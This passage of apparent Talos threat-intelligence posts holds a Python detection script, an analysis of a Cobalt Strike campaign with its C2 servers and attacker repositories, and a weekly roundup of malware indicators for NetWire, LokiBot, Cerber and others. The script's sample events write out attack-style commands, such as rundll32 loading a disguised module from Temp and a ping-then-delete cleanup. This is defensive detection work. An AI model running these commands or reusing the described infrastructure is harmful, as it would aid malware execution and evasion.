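    findings = []
    exe = image.lower().rsplit("\\", 1)[-1]
    if exe == "rundll32.exe":
        m = RUNDLL_MODULE.search(command_line)
        if m:
            module = m.group(1).strip()
            if LOCAL_TEMP.search(module):
                findings.append("rundll32_module_from_local_temp")
            if not module.lower().endswith(".dll"):
                findings.append("rundll32_module_without_dll_extension")
    elif exe == "msiexec.exe":
        if (MSI_QUIET.search(command_line) and MSI_INSTALL.search(command_line)
                and LOCAL_TEMP.search(command_line)):
            findings.append("msiexec_quiet_install_from_local_temp")
    elif exe == "mshta.exe":
        if LOCAL_TEMP.search(command_line) and ".hta" in command_line.lower():
            findings.append("mshta_hta_from_local_temp")
    elif exe == "cmd.exe":
        if PING_THEN_DEL.search(command_line):
            findings.append("ping_delay_then_delete")
    return findings


def hunt(events):
    """Classify every event; returns one findings list per event, index-aligned."""
    return [classify_process_event(e["image"], e["cmd"]) for e in events]


# Constructed events. Payload file names follow the campaign; "EntryPoint",
# payload.msi, loader.exe and the ping/del command shape are placeholders.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\mshta.exe",
     "cmd": r'mshta.exe "C:\Users\victim\AppData\Local\Temp\example.hta"'},
    {"image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r"rundll32.exe C:\Users\victim\AppData\Local\Temp\newmodeler.dll,EntryPoint"},
    {"image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r'rundll32.exe "C:\Users\victim\AppData\Local\Temp\strymon.png",EntryPoint'},
    {"image": r"C:\Windows\System32\msiexec.exe",
     "cmd": r"msiexec /quiet /i C:\Users\victim\AppData\Local\Temp\payload.msi"},
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmd": r'cmd.exe /c ping 1.1.1.1 -n 4 & del "C:\Users\victim\AppData\Local\Temp\loader.exe"'},
    # Benign look-alikes that must not fire.
    {"image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    {"image": r"C:\Windows\System32\msiexec.exe",
     "cmd": r"msiexec /i C:\Users\victim\Downloads\vendor-setup.msi"},
]

if __name__ == "__main__":
    for event, found in zip(SAMPLE_EVENTS, hunt(SAMPLE_EVENTS)):
        print(found or ["-"], event["cmd"])
```

These rules are deliberately narrow: rundll32 loading a module from the local temp folder is rare in well-managed fleets, and a module name that does not end in .dll almost never occurs legitimately, so the two together are a strong signal even without the Bitbucket URL, which the actor can change at will.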

Payload

Talos discovered that the final payload of this campaign is a Cobalt Strike beacon. Cobalt Strike is a modular, customizable attack framework; threat actors can add or remove features according to their intentions. Employing Cobalt Strike beacons in the infection chain lets the attackers blend their malicious traffic with legitimate traffic and evade network detection. Because commands can be configured in the beacon configuration, the attacker can also perform operations such as injecting other malicious binaries into running processes on the infected machine without shipping a separate injection module in the infection chain.

The Cobalt Strike beacon configurations of this campaign showed us various characteristics of the beacon binary:
  • C2 server.
  • Communication protocols.
  • Process injection techniques.
  • Malleable C2 Instructions.
  • Target process to spawn for x86 and x64 processes.
  • Watermark : "Xi54kA==".
Cobalt Strike beacon configuration sample.

The Cobalt Strike beacon used in this campaign has the following capabilities:
  • Executes arbitrary code in the target processes through process injection. Target processes described in the beacon configuration related to this campaign include:
  x86:
    "%windir%\syswow64\dns-sd.exe"
    "%windir%\syswow64\rundll32.exe"
    "%windir%\syswow64\dllhost.exe -o enable"

  x64:
    "%windir%\sysnative\getmac.exe /V"
    "%windir%\sysnative\rundll32.exe"
    "%windir%\sysnative\DeviceParingWizard.exe"

  • A high-reputation domain defined in the HostHeader component of the beacon configuration. The actor is using this redirector technique to make the beacon traffic appear legitimate and avoid detection.

Malicious repository

The attacker in this campaign has hosted malicious DOTM templates and Cobalt Strike DLLs on Bitbucket using different accounts. We spotted two attacker-controlled accounts "atlasover" and "clouchfair" in this campaign: https[://]bitbucket[.]org/atlasover/atlassiancore/downloads and https[://]bitbucket[.]org/clouchfair/oneproject/downloads.

During our analysis, the account "atlasover" was live and showed us the hosting information of some of the malicious files in this campaign.

Attacker-controlled bitbucket repository.

Talos also discovered in VirusTotal that the attacker operated the Bitbucket account "clouchfair," using the account to host two other information stealer executables, Redline and Amadey, along with a malicious DOTM template and Cobalt Strike DLL.

Command and control

Talos discovered the C2 server operated in this campaign at the IP address 185[.]225[.]73[.]238. It runs Ubuntu Linux 18.04, is located in the Netherlands and is part of the Alibaba Cloud infrastructure.

Shodan search results showed that the C2 server presented two self-signed SSL certificates with the serial numbers 6532815796879806872 and 1657766544761773100, both valid from July 14, 2022 to July 14, 2023.

SSL certificate associated with the C2 servers.



Pivoting on the SSL certificates disclosed another Cobalt Strike C2 server at the IP address 43[.]154[.]175[.]230, running Ubuntu Linux 18.04 and located in Hong Kong, which is also part of the Alibaba Cloud infrastructure and is likely operated by the same actor.

Coverage

Ways our customers can detect and block this threat are listed below.
Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.
Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.
Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.
Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.
Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.
Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.
Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.
Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.
Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.
Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort Rule 60600 is available for this threat.

The following ClamAV signatures have been released to detect this threat:
Win.Packed.Generic-9956955-0
Win.Malware.CobaltStrike-9968593-1
Win.Dropper.AgentTesla-9969002-0
Win.Dropper.Swisyn-9969191-0
Win.Trojan.Swisyn-9969193-0
Win.Malware.RedlineStealer-9970633-0

IOC

The IOC list is available in Talos' Github repo here.


Threat Roundup for September 16 to September 23

23 September 2022 at 22:06

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Sept. 16 and Sept. 23. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:

Threat Name Type Description
Win.Dropper.NetWire-9970213-0 Dropper NetWire is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, remote desktop and read data from connected USB devices. NetWire is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Trojan.LokiBot-9970418-0 Trojan Lokibot is an information-stealing malware designed to siphon off sensitive information stored on an infected device. It is modular in nature, supporting the ability to steal sensitive information from a number of popular applications. It is commonly pushed via malicious documents delivered via spam emails.
Win.Ransomware.Cerber-9970426-0 Ransomware Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension ".cerber," although in more recent campaigns, other file extensions are used.
Win.Packed.Gamarue-9970619-0 Packed Gamarue, also known as Andromeda, is a botnet used to spread malware, steal information and perform activities such as click fraud.
Win.Packed.Nanocore-9970631-0 Packed Nanocore is a .NET remote access trojan. Its source code has been leaked several times, making it widely available. Like other RATs, it allows full control of the system, including recording video and audio, stealing passwords, downloading files and recording keystrokes.
Win.Dropper.Formbook-9970817-0 Dropper Formbook is an information stealer that attempts to collect sensitive information from an infected machine by logging keystrokes, stealing saved web browser credentials, and monitoring information copied to the clipboard.
Win.Ransomware.BlackMatter-9970818-0 Ransomware BlackCat ransomware, also known as "ALPHV", has quickly gained notoriety for being used in double ransom attacks against companies in which attackers encrypt files and threaten to leak them. It uses the combination of AES128-CTR and RSA-2048 to encrypt the files on the victim's computer.
Win.Dropper.DarkKomet-9970824-0 Dropper DarkKomet is a freeware remote access trojan released by an independent software developer. It provides the same functionality you would expect from a remote access tool: keylogging, webcam access, microphone access, remote desktop, URL download and program execution, etc.

Threat Breakdown

Win.Dropper.NetWire-9970213-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 12 samples
Registry Keys Occurrences
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: LanguageList
7
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: WindowsUpdate
7
Mutexes Occurrences
8-3503835SZBFHHZ 5
73M9N-T0-UB83K6J 2
S-1-5-21-2580483-12441695089072 2
S-1-5-21-2580483-12443106840201 2
1N6PO-QCTT825WY- 2
S-1-5-21-2580483-1244465298972 1
3MAM487FD866043M 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
149[.]154[.]167[.]220 7
34[.]102[.]136[.]180 4
198[.]54[.]117[.]215 2
198[.]54[.]117[.]210/31 2
99[.]83[.]154[.]118 2
54[.]251[.]110[.]33 2
198[.]54[.]117[.]217 1
198[.]71[.]232[.]3 1
2[.]57[.]90[.]16 1
185[.]107[.]56[.]59 1
52[.]20[.]84[.]62 1
34[.]117[.]168[.]233 1
69[.]163[.]224[.]231 1
109[.]123[.]121[.]243 1
216[.]40[.]34[.]41 1
199[.]59[.]243[.]222 1
31[.]220[.]126[.]24 1
172[.]96[.]191[.]143 1
45[.]224[.]128[.]33 1
207[.]244[.]241[.]148 1
162[.]213[.]255[.]94 1
172[.]67[.]180[.]112 1
23[.]230[.]152[.]134 1
154[.]86[.]220[.]203 1
104[.]247[.]82[.]53 1
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
api[.]telegram[.]org 7
www[.]wearestallions[.]com 2
www[.]intelsearchtech[.]com 2
www[.]kigif-indonesia[.]com 2
www[.]homecrowds[.]net 2
www[.]beachloungespa[.]com 2
www[.]northpierangling[.]info 1
www[.]xn--agroisleos-09a[.]com 1
www[.]cacconsults[.]com 1
www[.]fdupcoffee[.]com 1
www[.]drivemytrains[.]xyz 1
www[.]banchers[.]com 1
www[.]olympushotel[.]xyz 1
www[.]imbtucan[.]site 1
www[.]leeanacosta[.]com 1
www[.]searchnewsmax[.]com 1
www[.]supera-digital[.]com 1
www[.]fitnesshubus[.]com 1
www[.]kettlekingz[.]co[.]uk 1
www[.]meditgaming[.]store 1
www[.]alpenfieber-events[.]com 1
www[.]bobijnvidit[.]xyz 1
www[.]thespecialtstore[.]com 1
www[.]momotou[.]xyz 1
www[.]tricon[.]info 1
*See JSON for more IOCs
Files and or directories created Occurrences
%HOMEPATH%\temp 12
%TEMP%\RegSvcs.exe 7
\9_101\jhipudjmrh.pdf 1
%TEMP%\5_610\wuqiiqpl.cpl 1
\9_101\kxfbovr.dll 1
%TEMP%\5_610\xjusg.bin 1
\9_101\lbmnehl.log 1
%TEMP%\5_610\xpdmnqvrj.cpl 1
\9_101\lexccit.txt 1
%TEMP%\5_610\xxnvjp.log 1
\9_101\lpuhp.docx 1
\9_101\lresp.xl 1
\9_101\mitwohb.dll 1
\9_101\mnxau.jpg 1
\9_101\mrbwugug.ico 1
\9_101\mvevanqm.pdf 1
\9_101\nimkrnwadi.mcq 1
\9_101\njbrtxdts.xls 1
\9_101\njxivhu.ppt 1
\9_101\nnnbox.exe 1
\9_101\nxvix.log 1
\9_101\oavf.xml 1
\9_101\ocuqib.dll 1
\9_101\oipjamjjo.jpg 1
\4_58\vxgw.cpl 1
*See JSON for more IOCs

File Hashes

17d3937fb3aceacc0ac99f94a2347b87b22cbc2e7c341830ad9ad0a8f88babee 27288965d55cf7459cfa35b7a37ab9298f34e6e7734f6d6609527d573e5db71e 3788fc76ea84b87735527d224d39b4672b970c6bbcdd59b60978945b76d0fb1b 39ef261dd5ada5c7b29412ca0e95e6950de77ac8ab9f6e096692fd553a6e3ace 4101b1f2efa7e4ac9711140c8e5e724bf5a74ac0b4ab76f0d6c4e23374977627 49f2bb5892eda8223f4709f6b84366911b000652eb19085b09dc5998fe8c8259 815132096b824dbe0c8497cfd85f7508eeac3718c147541c791701df09b6f196 8f8813e3ed0cdb3ac92de8e6003bc83c0ec859fc717748cab6a45f56a98a9201 a96ccfc5b5b64660b986d22b9bcc96cb5e178d3d506893bd24a959a5338a4a32 d22989a65a91ee78b6af2fd2a9cadf2656637959cc07cd1b92baeb8c5950b45d e2ad52e5cc9b5e5a51811e13daeed3f6d61e239a079ec3617f2c1a4400f6dcaf f7a74e6284a41f39cba3f0c186c61ad96fac8a3099b88e04071fdd8e1eabe9bf

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Trojan.LokiBot-9970418-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 11 samples
Registry Keys Occurrences
<HKLM>\SOFTWARE\WOW6432NODE\PAADMME 11
<HKLM>\SOFTWARE\WOW6432NODE\PAADMME\NEAPOLITANERE 11
<HKLM>\SOFTWARE\WOW6432NODE\PAADMME\NEAPOLITANERE\BINOCLES 11
<HKLM>\SOFTWARE\WOW6432NODE\PAADMME\NEAPOLITANERE\BINOCLES\UDPRINT 11
<HKLM>\SOFTWARE\WOW6432NODE\TOXOSIS 11
<HKLM>\SOFTWARE\WOW6432NODE\TOXOSIS\BENZENSULFONAT 11
<HKLM>\SOFTWARE\WOW6432NODE\TOXOSIS\BENZENSULFONAT\INGEVALDS 11
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\SKABHALS 11
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\SKABHALS\AMARYLLIS 11
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\SKABHALS\AMARYLLIS\RECHARTING 11
<HKLM>\SOFTWARE\WOW6432NODE\PAADMME\NEAPOLITANERE\BINOCLES\UDPRINT
Value Name: Girleen
11
<HKLM>\SOFTWARE\WOW6432NODE\TOXOSIS\BENZENSULFONAT\INGEVALDS
Value Name: befugteres
11
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\SKABHALS\AMARYLLIS\RECHARTING
Value Name: Krogfiskeri
11
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
103[.]170[.]254[.]140 1
Files and or directories created Occurrences
%LOCALAPPDATA%\Konstellations 11
%LOCALAPPDATA%\Konstellations\Materes 11
%LOCALAPPDATA%\Konstellations\Materes\window-restore-symbolic.symbolic.png 11
%TEMP%\ns<random, matching '[a-z][A-F0-9]{1,4}'>.tmp 11
%TEMP%\ns<random, matching '[a-z][A-F0-9]{4}'>.tmp\System.dll 11
%LOCALAPPDATA%\Konstellations\Materes\Arider.bmp 1
%LOCALAPPDATA%\Konstellations\Materes\FROSSEN.bmp 1
%LOCALAPPDATA%\Konstellations\Materes\Praktikleder8.bmp 1
%LOCALAPPDATA%\Konstellations\Materes\Digoxins6.bmp 1
%LOCALAPPDATA%\Konstellations\Materes\BIOSYNTHESIZE.bmp 1
%LOCALAPPDATA%\Konstellations\Materes\countertime.bmp 1
%LOCALAPPDATA%\Konstellations\Materes\ACRITOL.bmp 1
%LOCALAPPDATA%\Konstellations\Materes\lnlige.bmp 1
%LOCALAPPDATA%\Konstellations\Materes\Kloakeringsomraadet.bmp 1
%LOCALAPPDATA%\Konstellations\Materes\Coitalt.bmp 1
%LOCALAPPDATA%\Konstellations\Materes\Charlies.bmp 1

File Hashes

14d11fc331b5d9a84a42fa8b6b2155f687cf66c1af5bd32ae1347fda6667fa60 2d15ef038e1702ebcd7b6d50eab97db925195cb382a9cabcf6a70ac62452d39c 418a2c968f439988a20034816348d47e0ba3fa2a6150a1f5760202a8b3a5621e 7d48995a3e95a8f0f758601cc5fbedbda1570eb17fd73e3091e6690a4f423a45 a0f0783a36626040af491251f7fc77bdfd3fdc89ee7d8ade8a289828c35e9280 a4238922317136e633e9dd9d654fd89cc47414766a658a3bdcb16963aa191ed0 a72cbeca7367862e3597f4923b36ef84c534d771aa1d439ab21bc74de1dde400 ca449b3e0e043546c5746fa6787b29c94ecb86b3f42de21e944d704502ade3da d4912d4d34d11e30c5859742186d8355a42b1e83fb54ac2a121186fa46234862 d93f4740ef92a826d328f73dea62803903254fbcdb1e02aeb6dc78e214bc0645 f0ece4c4a676aef252751fa3277e1ad4a3e1050c177bd289994c63852ae3198e

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Ransomware.Cerber-9970426-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 24 samples
Registry Keys Occurrences
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: LanguageList
24
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\dhcpqec.dll,-100
24
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\dhcpqec.dll,-101
24
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\dhcpqec.dll,-103
24
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\dhcpqec.dll,-102
24
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\napipsec.dll,-1
24
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\napipsec.dll,-2
24
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\napipsec.dll,-4
24
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\napipsec.dll,-3
24
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\tsgqec.dll,-100
24
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\tsgqec.dll,-101
24
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\tsgqec.dll,-102
24
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\tsgqec.dll,-103
24
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\eapqec.dll,-100
24
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\eapqec.dll,-101
24
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\eapqec.dll,-102
24
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\eapqec.dll,-103
24
Mutexes Occurrences
shell.{381828AA-8B28-3374-1B67-35680555C5EF} 24
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
178[.]128[.]255[.]179 24
149[.]202[.]64[.]0/27 24
149[.]202[.]122[.]0/27 24
149[.]202[.]248[.]0/22 24
172[.]66[.]42[.]238 16
172[.]67[.]2[.]88 11
172[.]66[.]41[.]18 8
104[.]20[.]20[.]251 7
104[.]20[.]21[.]251 6
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
api[.]blockcypher[.]com 24
bitaps[.]com 24
chain[.]so 24
btc[.]blockr[.]io 24
xxxxxxxxxxxxxxxx[.]1k1dxt[.]top 24
Files and or directories created Occurrences
%TEMP%\d19ab989 24
%TEMP%\d19ab989\4710.tmp 24
%TEMP%\d19ab989\a35f.tmp 24
%LOCALAPPDATA%\Microsoft\Office\Groove1\System\CSMIPC.dat 24
%TEMP%\tmp<random, matching [A-F0-9]{1,4}>.tmp 24
%TEMP%\tmp<random, matching [A-F0-9]{1,4}>.bmp 24
<dir>\_READ_THIS_FILE_<random, matching [A-F0-9]{4,8}>_.hta 24
<dir>\_READ_THIS_FILE_<random, matching [A-F0-9]{4,8}>_.txt 24
<dir>\_READ_THIS_FILE_<random, matching [A-F0-9]{4,8}>_.jpeg 24

File Hashes

05602feb977139c96c226969997d8bc55bd47b1d142252d3ec4067591dda85f2 06cba247d80b0c6c4f5865e34ad3c33fc1ef5ffd0a285f3009d64109b0ee3d22 09768afcaa8eae74f05841e49ece1ac338318c0d5f0153c2db6cecf169718698 0fb820719ef10ee032dbb69607c6fc222fa70b64844af4f04f6eecafc08345a7 2738e1df3421ba011f912c22e19bdae3b29d1fb1092be51174da6dbbbc72df8d 3c6776dd10054cad73b50c96d62e3b7a1e807ef1f8e6355d097cac12ddccb8c8 3eb0b591eb274fa052c4a7cdfcb6c943361c9a199ca33679678791399e8b8988 4505a343015d3ef0ad624e61ecfc61e2fc499a11fc5a52911c424de5ccd99d9e 52573c863390fde5244133cc965bf2501f0eb28e7d76a9996bc300070d41941b 5ce6f26a04a5bf871018eecafb8e9f8f7284ebbd134230574da1574830d4646e 5ed48cdf13e9681085390956e25883680a6b1b4600d99608d84c126d57832025 61a051fabbf66383709e43bf77fb49c6a645f2f479eaddffa6769010cb690eea 74c864c6b31afa1db6c8d6fb2bb8860b655d3554c8d309a91d894fd210351b7e 8642a1c54c99774f7ffc1ade073f2ccc90b6e2fcacb0118f1eca20b20018d590 9d14c9d7fca8e623607986ac1c27a149dfa9a82ac267475bed080636a5870269 a8d9f9469418516807ac7ce3dbf50de0ef3e0d2ef122b2932ba908cdadc3a5bb b289bcb40e6ee16638ae7bdadb95ebbebae75568e751820d261959394d7e7f02 b86d1564a606793a4427d5795a37825eeb11296b01cae339da01ab64feb73922 c4698b067e10ecf2ac5a4e318703d46b33cbdcd9803ffabc4a9da147e5d271f1 dee4d4d3b765fc0ad7ba88d69104b5cf90a448eaf1623445033a0f671e44ffd1 e50306b8c8b4bfd52da321a30e3e28bbef41b333e5803a303791f27798a1299c e5af2faef6688bf5e5889e78357bf993e13a1d21086dfb8a4ae268ae2004068f f330c988680055316a3aa2bc341e409096517381395469a32aa369a1940e9e5c ff2c3f6c56786af4fea96c55bb7877094ea482a162050721397dda1d82246ea0

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA This has coverage

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Packed.Gamarue-9970619-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: apdsdtsh
25
<HKCU>\SOFTWARE\APPDATALOW\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 25
<HKCU>\SOFTWARE\APPDATALOW\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
Value Name: Install
25
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\system32\Authias.exe
25
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: LanguageList
25
<HKCU>\SOFTWARE\APPDATALOW\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
Value Name: Client
25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.106
Value Name: CheckSetting
25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{01979C6A-42FA-414C-B8AA-EEE2C8202018}.CHECK.100
Value Name: CheckSetting
25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{852FB1F8-5CC6-4567-9C0E-7C330F8807C2}.CHECK.100
Value Name: CheckSetting
25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{852FB1F8-5CC6-4567-9C0E-7C330F8807C2}.CHECK.101
Value Name: CheckSetting
25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\SHELL
Value Name: NodeSlots
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\SHELL
Value Name: MRUListEx
1
<HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL
Value Name: NodeSlots
1
<HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL
Value Name: MRUListEx
1
Mutexes Occurrences
Local\{7FD07DA6-D223-0971-D423-264D4807BAD1} 25
{<random GUID>} 25
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
alrthesecuritywith[.]su 25
Files and or directories created Occurrences
\{4BC230AC-2EB3-B560-90AF-42B9C45396FD} 25
%LOCALAPPDATA%\Microsoft\Windows\WER\ERC\statecache.lock 25
%System32%\Authias.exe 25

File Hashes

04deccd24c8ba2a38462b2fbe8bbdfc70484892cbc0acdb28345de60b381f17c 07f1a829b39eb8df6754b4dbed45a71d4aac24c073702254b867113661423831 10bbe562791a00906cfcf42ce12046233438aedd689b92081c546f038fd23194 12981607682dab89979727d0ec582315b1565bf94a54cb5a08a876345c8c4dd7 17692c251e7257d3ab0db70615d9b30eeaddaf6958dcbd949bbaef0ded9e5d1e 23349c88ef430438af6b527e241074c7b2d6809337879da50b098c1a809cf814 25e0618244af804051450a99c664772473615c351714ce5a3d8912573ba964df 28b34665550780af293c665483967e1ba6be39b50bf1dd5d89c716990b67df4a 292139a3d2e6ac70015b05a225072c3f9d9d0b8ac39448e12733e33dbcb8add0 3662025e620ac8a337cb2e4a53d8953de01a92ee1439c2bac9b72de592dca969 3dca218d2bb5c419d0f92c5c5b8e9a891c817bc4c52f465fc89980f9c55551e6 4a2e7161239b8f9f3f9a3fcf868aa0fca6ca4890eceb629886062b6ff729385a 5535c54c6922219bf1ed1049b5e00c5a838f632b618b80eef36ccb10852f3de2 587713ec906ea8c3e5fee650abace23a1396ca69dd183253b8a6244bdfa3d5df 5e9f652ff2720dec825edb85e2abe9466e944287b35db49ac80e9adf95df165c 66196b18fcce2381b23c5575822a79542d009f039ec872eeaa199dbe97bbb26f 67f172a5505a404b8817a9f6dabb11a7d5c0bb4cc22d60e13a38d9a70a4d8e97 855033ed08a2ab3e8e157ba89696d9d9eab207a98fde70a60752f88607394b98 8cc1dcb771e5d781e5fa805cbfc349b768996cb363ee311b97a56b7a485c50c3 8e2761a959dbf166a680e0865438238f3f857a25466fc497bb5c25c1ce7f31c6 957881f71c8988d70b6d9aef095a70bae4256adefc160374ef4db1a09cf526b7 965e0adee6460a5bf1724e9b9c37542cff44abc50a7c8cf1a7b027bd0a3c8885 99584a5853ee407a4924921589e995dbbc135014c2f7a09e0887f45dfb0ce1c4 9b6b29ddd0789e95a73c9ea48d7335555dbf20064b8459549729332044c341c2 a917ac90f8a680731d543c6f93cdb7968d750fda8a36e8f531c01b5849150cb2
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Packed.Nanocore-9970631-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 16 samples
Registry Keys Occurrences
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: AGP Manager
16
Mutexes Occurrences
Global\{5f88600c-86da-4b30-b45c-8e6d9614baec} 16
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
176[.]136[.]210[.]152 16
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
foobosmy[.]duckdns[.]org 16
Files and or directories created Occurrences
%ProgramFiles(x86)%\AGP Manager 16
%ProgramFiles(x86)%\AGP Manager\agpmgr.exe 16
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5 16
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs 16
